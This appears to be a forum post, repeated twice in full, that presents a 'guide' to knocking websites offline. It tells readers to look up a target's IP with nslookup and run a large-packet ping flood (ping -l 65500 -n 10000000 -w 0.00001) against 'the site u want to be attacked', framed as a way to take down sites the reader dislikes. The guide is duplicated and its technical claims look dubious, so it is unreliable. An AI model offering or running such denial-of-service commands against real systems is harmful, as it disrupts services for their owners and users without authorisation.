[Guide] Dos Attack
Hey Guys,
What Is DoS?
DoS attackes can target end-user systems, servers, routers and Network links(websites)
Requirments:
1)CMD
2)IP Of Targeted Site
How TO GET IP OF ANY SITE??
Open ur CMD and type nslookup Site-Name
(e.g nslookup Google)
Now write this command in CMD For Attack on Any Site/ Server
ping SITE-IP -l 65500 -n 10000000 -w 0.00001
-n 10000000= the number of DoS attemps
SITE-IP= Replace the text with the ip address of the site u want to be attacked
-w 0.00001 = It is the waiting time after one ping attack.
PS: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack!!
Unless your a coder or have a program, you can only DDoS weak sites,Its a good tut, but not usefull if you hate a strongly protected website and want to take it down
What Is DoS?
DoS attackes can target end-user systems, servers, routers and Network links(websites)
Requirments:
1)CMD
2)IP Of Targeted Site
How TO GET IP OF ANY SITE??
Open ur CMD and type nslookup Site-Name
(e.g nslookup Google)
Now write this command in CMD For Attack on Any Site/ Server
ping SITE-IP -l 65500 -n 10000000 -w 0.00001
-n 10000000= the number of DoS attemps
SITE-IP= Replace the text with the ip address of the site u want to be attacked
-w 0.00001 = It is the waiting time after one ping attack.
PS: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack!!
Unless your a coder or have a program, you can only DDoS weak sites,Its a good tut, but not usefull if you hate a strongly protected website and want to take it down